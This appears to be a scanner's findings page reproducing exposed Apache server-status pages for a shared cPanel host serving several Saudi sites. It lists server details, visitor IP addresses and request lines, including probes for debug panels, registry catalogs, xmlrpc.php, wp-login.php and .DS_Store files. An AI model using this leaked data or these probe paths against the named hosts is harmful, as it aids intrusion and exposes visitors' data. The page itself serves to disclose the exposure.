      31.13.127.7http/1.1zed.sa:443GET /menu/wp-content/uploads/2023/06/65-Zed-BrandGuideline-Apri
      
      0-265560/151/2109_
      19.851274311586430.011.67245.72
      157.55.39.53http/1.1albayan.edu.sa:443GET /web/441.html2 HTTP/1.1
      
      0-265560/200/2156_
      19.82170317757130.09.45289.19
      95.187.182.95http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-265560/137/1937_
      19.42106520744550.016.05285.13
      51.252.227.180http/1.1
      
      0-265560/124/2090_
      19.72388119545060.06.67229.45
      66.249.93.165http/1.1albayan.edu.sa:443GET /.well-known/traffic-advice HTTP/1.1
      
      0-265560/173/1992_
      19.65443212313050.014.42296.35
      31.167.72.252http/1.1albayan.edu.sa:443GET /e_sch/css/images/arrow-next.png HTTP/1.1
      
      0-265560/115/2532_
      19.72368015633250.014.35361.45
      87.236.176.140http/1.1wordgame.thenewjeddah.com:80GET / HTTP/1.1
      
      0-265560/117/2125_
      19.733063911752360.024.57359.15
      51.36.233.20http/1.1jawad.com.sa:443POST /api/v.1/front/related/product HTTP/1.1
      
      0-265560/118/1830_
      19.85892213914080.017.67342.19
      172.70.42.164http/1.1support.daaris.com:443GET /templates/new/assets/css/owl.carousel.css?v=d2d29a HTTP/1.
      
      0-265560/168/2440_
      19.6146332616387720.020.25214.49
      51.36.233.20http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/mHTwk5h6W5NiZWBhJv3mec
      
      0-265560/158/2244_
      19.75274019698540.040.77407.34
      5.163.95.128http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      0-265560/139/2209_
      19.88342498988740.017.89257.70
      2.90.126.38http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-265561/265/2253K
      19.890121598060.87.75237.32
      172.68.192.205http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-265560/126/1912_
      19.7626718658600.06.69333.69
      51.252.227.180http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-265560/149/1949_
      19.7717408480050.063.43398.76
      66.249.66.83http/1.1albayan.edu.sa:80GET /albayan_library/upload/books/gamian1.pdf HTTP/1.1
      
      0-265560/79/2024_
      19.71409016904040.067.39359.70
      155.138.199.20http/1.13dvi.com:80HEAD /wordpress HTTP/1.1
      
      0-265560/164/2347_
      19.77257212587890.027.51289.95
      31.167.72.252http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-265560/152/2114_
      19.7333339517235450.08.13220.17
      46.153.234.143http/1.1albayan.edu.sa:443GET /imgweb/1445/%D9%88%D9%85%D9%82%D8%B1%D8%B1%20%D8%AC%D8%AF%
      
      0-265560/150/2071_
      19.1443126317951310.06.68194.21
      5.82.150.145http/1.1
      
      0-265560/137/2041_
      19.6943428791970.09.51282.96
      176.224.208.48http/1.1zed.sa:443GET /menu/wp-content/plugins/elementor/assets/lib/font-awesome/
      
      0-265560/143/2077_
      19.11475214896570.07.65313.53
      5.82.150.145http/1.1
      
      0-265560/164/2075_
      19.71410289255660.036.20276.90
      51.36.233.20http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-265560/198/2380_
      19.8928313817680.023.94360.31
      2.90.126.38http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/1D92GOCkUUxk9KBgmE7pG7
      
      1-265580/178/1957_
      19.34256525417120.09.28318.68
      31.167.119.169http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      1-265580/112/2023_
      19.17443012894140.023.32321.34
      31.167.72.252http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      1-265580/181/2101_
      19.1347560010805960.015.55367.01
      5.82.150.145http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%201%D9%85%20%D8%AF%D8%B1%D8
      
      1-265580/153/1933_
      18.9410615216159840.07.75270.75
      51.252.227.180http/1.1
      
      1-265580/182/2006_
      19.25406379300660.09.25242.22
      155.138.199.20http/1.13dvi.com:443HEAD /home HTTP/1.1
      
      1-265581/128/1762K
      19.460110012900.820.76242.68
      172.70.246.173http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      1-265580/119/1892_
      19.421222910034380.017.18234.28
      207.46.13.116http/1.1jawad.com.sa:443GET /en/details/1551 HTTP/1.1
      
      1-265580/190/1973_
      19.2243149813706160.09.21279.54
      5.82.150.145http/1.1albayan.edu.sa:443GET
      Found on 2024-05-26 09:19
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7b71f345c

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 26-May-2024 11:24:49 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  3 days 7 hours 19 minutes 59 seconds
      Server load: 0.45 0.38 0.39
      Total accesses: 463812 - Total Traffic: 64.2 GB - Total Duration: 495568382
      CPU Usage: u267.7 s30.43 cu1919.14 cs420.05 - .923% CPU load
      1.62 requests/sec - 235.8 kB/second - 145.2 kB/request - 1068.47 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 238 idle workers
      __R________K_______________K____________________________________
      _____________________________R________K___________R_R___________
      ____________________K___W_______________________________K_______
      ________..................................................______
      _________________K_______________K__________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-265560/158/2279_
      16.90190021695080.07.74273.30
      5.82.80.238http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      0-265560/158/1940_
      16.824113124360.06.59322.91
      185.185.80.64http/1.1
      
      0-265560/173/2043R
      16.82264010909840.08.65239.21
      31.167.119.169http/1.1
      
      0-265560/120/2078_
      16.9969611351020.06.65240.70
      31.167.168.136http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=172 HTTP/1.1
      
      0-265560/172/2128_
      17.00552317711990.08.74288.48
      87.250.224.22http/1.1akg.sa:443GET /robots.txt HTTP/1.1
      
      0-265560/128/1928_
      16.73166120742010.015.97285.05
      31.167.72.252http/1.1
      
      0-265560/100/2066_
      16.69249619529120.04.06226.84
      162.142.125.13http/1.1
      
      0-265560/149/1968_
      16.892121512269670.09.18291.11
      93.169.134.191http/1.1jawad.com.sa:443POST /api/v.1/front/category/product HTTP/1.1
      
      0-265560/104/2521_
      16.9018810015407170.011.32358.42
      66.249.66.82http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A7%D9%84%D8%B9%D8%B4%D8%B1%20%D8%A7%D9%8
      
      0-265560/94/2102_
      16.90209011110690.04.24338.82
      45.77.93.142http/1.1proxy-subdomains-vhost.localhosHEAD /bc HTTP/1.1
      
      0-265560/99/1811_
      16.801351213893050.015.99340.50
      31.167.119.169http/1.1
      
      0-265561/146/2418K
      17.010116377680.818.93213.17
      172.70.80.41http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-265560/139/2225_
      16.93181419665350.040.01406.58
      93.169.134.191http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/mVA2ye1496EvjdQq3aY0zX
      
      0-265560/123/2193_
      16.8625938974390.017.31257.13
      93.169.134.191http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/vBf31fXv4mpCKGy62qfYEj
      
      0-265560/243/2231_
      16.8121021584480.06.40235.97
      97.74.210.99http/1.1
      
      0-265560/98/1884_
      16.96153418592760.05.97332.97
      93.169.134.191http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-265560/141/1941_
      16.8015038412780.063.29398.62
      31.167.119.169http/1.1
      
      0-265560/69/2014_
      16.86243015992540.066.96359.27
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=1467&t=135.181.180.59&c=5 HTT
      
      0-265560/132/2315_
      16.882362212376370.021.53283.97
      93.169.134.191http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-265560/142/2104_
      16.95172317217650.07.11219.15
      93.169.134.191http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/CtIaCN22ICjRoki7a7OopS
      
      0-265560/135/2056_
      16.8923525117947910.06.31193.84
      93.169.134.191http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/9JgY3vHbrl2S4GXlI5t4ak
      
      0-265560/118/2022_
      16.9814228634350.08.35281.79
      52.167.144.55http/1.1durratalkhamis.alnwisher.com:44GET /robots.txt HTTP/1.1
      
      0-265560/123/2057_
      16.78258014761770.03.73309.61
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=1458&t=65.108.203.133&c=5 HTT
      
      0-265560/153/2064_
      16.9317509241700.035.69276.39
      31.167.119.169http/1.1albayan.edu.sa:80GET /web/441.html2 HTTP/1.1
      
      0-265560/176/2358_
      16.81115013802800.022.17358.54
      31.167.72.252http/1.1
      
      1-265580/151/1930_
      16.591522625406450.08.35317.75
      93.169.134.191http/1.1jawad.com.sa:443POST /api/v.1/front/category/product HTTP/1.1
      
      1-265580/97/2008_
      16.38191112876970.022.56320.58
      5.82.80.238http/1.1
      
      1-265581/154/2074K
      16.650110778130.812.59364.05
      172.69.214.142http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      1-265580/142/1922_
      16.5223217416142870.07.05270.05
      31.167.72.252http/1.1albayan.edu.sa:443GET /imgweb/1445/747.pdf HTTP/1.1
      
      1-265580/111/1935_
      16.6320999198730.08.12241.09
      97.74.210.99http/1.1sulaimaniya.edu.sa:80POST /xmlrpc.php HTTP/1.1
      
      1-265580/103/1737_
      16.654769941860.03.48225.40
      185.185.80.64http/1.1sulaimaniya.edu.sa:80POST /xmlrpc.php HTTP/1.1
      
      1-265580/88/1861_
      16.64159610027240.014.79231.89
      148.72.215.37http/1.1sulaimaniya.edu.sa:80POST /xmlrpc.php HTTP/1.1
      
      1-265580/174/1957_
      16.44135412277080.07.23277.55
      31.167.119.169http/1.1
      
      1-265580/167/1881_
      16.61141319377820.022.48264.84
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.p
      Found on 2024-05-26 08:24
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7587bfb26

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 26-May-2024 08:15:51 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  3 days 4 hours 11 minutes 1 second
      Server load: 0.58 0.47 0.43
      Total accesses: 443791 - Total Traffic: 62.0 GB - Total Duration: 487110836
      CPU Usage: u181.02 s14.77 cu1919.14 cs420.05 - .924% CPU load
      1.62 requests/sec - 237.1 kB/second - 146.6 kB/request - 1097.61 ms/request
      21 requests currently being processed, 0 workers gracefully restarting, 229 idle workers
      _______________K_________K_________________K________K____K______
      ______________KKK________________________K_W______________K_____
      K_____KK_____________________________________K____K___K_________
      ________.................................................._K____
      ____________________K____K_____________K____....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-265560/64/2185_
      7.25562621618700.02.90268.46
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/jquery-gmap/.DS_Store HTTP/1.1
      
      0-265560/49/1831_
      7.1320126610859120.03.14319.46
      51.252.157.253http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-265560/66/1936_
      7.21126210839420.07.53238.09
      31.167.168.136http/1.1albayan.edu.sa:443GET /js/jquery-1.3.2.js HTTP/1.1
      
      0-265560/48/2006_
      7.405811260040.03.65237.70
      31.167.72.252http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-265560/100/2056_
      7.201912717623730.03.21282.95
      103.163.220.170http/1.1garndhabi.org:80GET /style2.php HTTP/1.1
      
      0-265560/61/1861_
      7.26552620430190.04.11273.18
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/jquery-superbox/.DS_Store HTTP/1.1
      
      0-265560/46/2012_
      7.25562719495120.02.49225.28
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/jquery/.DS_Store HTTP/1.1
      
      0-265560/62/1881_
      7.26551412210760.03.26285.19
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/planetary/.DS_Store HTTP/1.1
      
      0-265560/41/2458_
      7.25571215322070.04.53351.64
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/clockface/.DS_Store HTTP/1.1
      
      0-265560/36/2044_
      7.25562311075770.01.89336.47
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/jquery-nestable/.DS_Store HTTP/1.1
      
      0-265560/53/1765_
      7.24582213284690.02.10326.61
      172.71.154.81http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-265560/48/2320_
      7.2496116309000.011.03205.27
      31.167.168.136http/1.1albayan.edu.sa:443GET /e_sch/images/title.jpg HTTP/1.1
      
      0-265560/86/2172_
      7.3932919092480.05.77372.34
      103.163.220.172http/1.1garndhabi.org:80GET /ten.php HTTP/1.1
      
      0-265560/46/2116_
      7.229308804120.02.82242.63
      31.167.168.136http/1.1albayan.edu.sa:80GET /web.html HTTP/1.1
      
      0-265560/58/2046_
      7.24582721509490.03.16232.73
      159.89.17.243http/1.1garndhabi.org:80GET /v2/_catalog HTTP/1.1
      
      0-265561/47/1833K
      7.40008550950.83.28330.28
      172.71.94.48http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-265560/40/1840_
      7.265507980270.028.50363.83
      159.89.17.243http/1.1garndhabi.org:80GET /uploads/.DS_Store HTTP/1.1
      
      0-265560/32/1977_
      7.25571015946630.063.47355.78
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/bootstrap-select2/.DS_Store HTTP/1.1
      
      0-265560/84/2267_
      7.14194312339440.020.30282.74
      51.252.157.253http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/tOjex3mEFyPsbTAT8gkfRn
      
      0-265560/36/1998_
      6.88149216747960.04.03216.07
      84.235.106.41http/1.1
      
      0-265560/76/1997_
      7.3237217911760.04.71192.23
      178.87.213.32http/1.1albayan.edu.sa:443GET /e_sch/images/title.jpg HTTP/1.1
      
      0-265560/55/1959_
      7.40128394100.04.18277.63
      172.70.86.70http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-265560/43/1977_
      7.2557014715640.01.00306.88
      159.89.17.243http/1.1garndhabi.org:80GET /assets/js/.DS_Store HTTP/1.1
      
      0-265560/50/1961_
      7.2111508844040.05.20245.90
      51.211.37.55http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      0-265560/66/2248_
      7.2110213212686100.04.43340.80
      51.252.250.64http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      1-265581/86/1865K
      6.9611253550266.64.47313.87
      172.71.183.76http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-265580/48/1959_
      6.8992012750310.05.21303.23
      31.167.168.136http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      1-265580/79/1999_
      6.91572010617760.02.66354.11
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/bootstrap-timepicker/.DS_Store HTTP/1.1
      
      1-265580/55/1835_
      6.91562515990070.02.76265.76
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/jquery-inputmask/.DS_Store HTTP/1.1
      
      1-265580/46/1870_
      6.9255259122180.04.58237.55
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/shape-hover/.DS_Store HTTP/1.1
      
      1-265580/46/1680_
      6.9156139904290.01.60223.52
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/jquery-block-ui/.DS_Store HTTP/1.1
      
      1-265580/47/1820_
      6.87137799971190.012.96230.07
      54.36.149.70http/1.1daris.live:443GET /user?redirect=product/93/50-living-room-ideas HTTP/1.1
      
      1-265580/53/1836_
      6.91555512158370.04.08274.40
      a05c4808ab.scan.leakix.orghttp/1.1garndhabi.org:80GET /server-st
      Found on 2024-05-26 05:15
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df712e30410

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 25-May-2024 13:00:40 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 2
      Parent Server MPM Generation: 1
      Server uptime:  2 days 8 hours 55 minutes 50 seconds
      Server load: 0.54 0.52 0.49
      Total accesses: 348809 - Total Traffic: 45.0 GB - Total Duration: 325476645
      CPU Usage: u293.36 s37.83 cu1337.57 cs286.33 - .954% CPU load
      1.7 requests/sec - 230.4 kB/second - 135.4 kB/request - 933.109 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 214 idle workers
      _____________________________K________________________R_________
      __________K___K______________R_________________________K_____R__
      __________K_________________________R_______________W___________
      ___________________________K_____...............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-1149340/224/1748_
      35.7577217158810.028.38180.78
      142.154.124.231http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-1149340/244/1397_
      35.7750276939450.016.55248.07
      212.62.98.80http/1.1jawad.com.sa:443GET /ar?gb=1&gclid=Cj0KCQjwmMayBhDuARIsAM9HM8d3LhdT8l4-3mFZn9wq
      
      0-1149340/275/1522_
      35.6910427336260.011.41126.18
      142.154.124.231http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.ttf HTTP/1.1
      
      0-1149340/271/1475_
      35.813309911440.036.23164.69
      54.36.148.254http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=704&t=54.36.150.51&c=5 HTTP/1
      
      0-1149340/220/1526_
      35.8041314075690.024.27237.27
      212.62.98.80http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/4ZxKmr7Lnx6PaOYBwrlqP3
      
      0-1149340/252/1398_
      35.45363210733630.018.38185.89
      31.167.192.192http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-1149340/218/1623_
      35.5618068314518900.029.10199.79
      49.232.145.205http/1.1zed.sa:443POST /wp-login.php HTTP/1.1
      
      0-1149340/255/1495_
      35.76621489645350.075.38251.82
      142.154.124.231http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%B5%D9%88%D8%B1%D8%A9%20%D9%88%D8%A7%D8%AA%
      
      0-1149340/273/1954_
      35.738429538090.060.45247.62
      31.166.198.204http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/video.png HTTP/1.1
      
      0-1149340/334/1605_
      35.4925419240000.08.87256.79
      31.167.69.220http/1.1albayan.edu.sa:443GET /web/images/logo_school.png HTTP/1.1
      
      0-1149340/220/1358_
      35.512292211964130.018.96158.48
      51.36.219.186http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-1149340/260/1791_
      35.55207314507310.019.85163.95
      178.73.98.211http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-1149340/357/1635_
      35.59144215507140.035.54289.37
      151.254.165.0http/1.1albayan.edu.sa:443GET /e_sch/css/images/arrow-next.png HTTP/1.1
      
      0-1149340/294/1654_
      35.4337005236450.014.25186.89
      31.167.192.192http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      0-1149340/299/1622_
      35.32223914220260.022.87129.64
      2.89.134.104http/1.1
      
      0-1149340/180/1400_
      35.681081296831150.032.54267.42
      2.90.221.247http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-1149340/224/1436_
      35.50241236696480.09.21242.64
      5.188.62.174http/1.1jawad.com.sa:443GET /admin HTTP/1.1
      
      0-1149340/244/1608_
      35.561947810530850.010.27269.24
      78.95.179.0http/1.1garndhabi.org:80GET /api/v1/members?page=4&city_id=3 HTTP/1.1
      
      0-1149340/265/1763_
      35.811229510420.07.35203.58
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-1149340/245/1525_
      35.443683510045610.015.52147.17
      31.167.192.192http/1.1albayan.edu.sa:443GET /web/250.html2 HTTP/1.1
      
      0-1149340/264/1563_
      35.6212539311376170.053.17156.56
      151.254.165.0http/1.1albayan.edu.sa:443GET /imgweb/1445/5/5%20-%20%D8%A7%D9%84%D8%AF%D8%B1%D8%A7%D8%B3
      
      0-1149340/283/1572_
      35.3227694353380.012.52209.11
      185.19.165.65http/1.1
      
      0-1149340/322/1593_
      35.747936497340.091.69244.85
      51.36.100.51http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-1149340/239/1489_
      35.4726958096150.022.75212.50
      216.244.66.198http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1489 HTTP/1.1
      
      0-1149340/418/1828_
      35.6511027592120.021.17212.53
      176.224.87.146http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/video.png HTTP/1.1
      
      1-161180/98/1405_
      7.4729230922091710.07.48246.82
      128.234.131.238http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83_%D8%A3%D8%B3%D8%A6%D9%84%D8
      
      1-161180/57/1519_
      7.7175210838110.07.78254.27
      31.166.198.204http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-161180/84/1486_
      7.542141457041730.00.94192.14
      178.73.98.211http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      1-161180/42/1472_
      7.6494210070070.02.14210.75
      51.36.100.51http/1.1albayan.edu.sa:443GET /e_sch/images/Background.jpg HTTP/1.1
      
      1-161181/44/1466K
      7.77016274450.811.62181.23
      172.70.80.125http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      1-161180/59/1309_
      7.453543528209680.02.01196.55
      31.167.192.192http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%A3%D8%B3%
      
      1-161180/42/1360_
      7.7538206847970.029.23180.72
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      1-16118
      Found on 2024-05-25 10:00
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df70455f1f1

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 25-May-2024 11:47:06 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 2
      Parent Server MPM Generation: 1
      Server uptime:  2 days 7 hours 42 minutes 16 seconds
      Server load: 0.36 0.45 0.48
      Total accesses: 339239 - Total Traffic: 44.2 GB - Total Duration: 321401097
      CPU Usage: u258.01 s30.83 cu1337.57 cs286.33 - .954% CPU load
      1.69 requests/sec - 231.2 kB/second - 136.7 kB/request - 947.418 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 213 idle workers
      ___________K_______________________W_K__________________________
      ________K________K_________________KK________________________R__
      ____________K_______________________________K___________________
      ____K________________________K___...............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
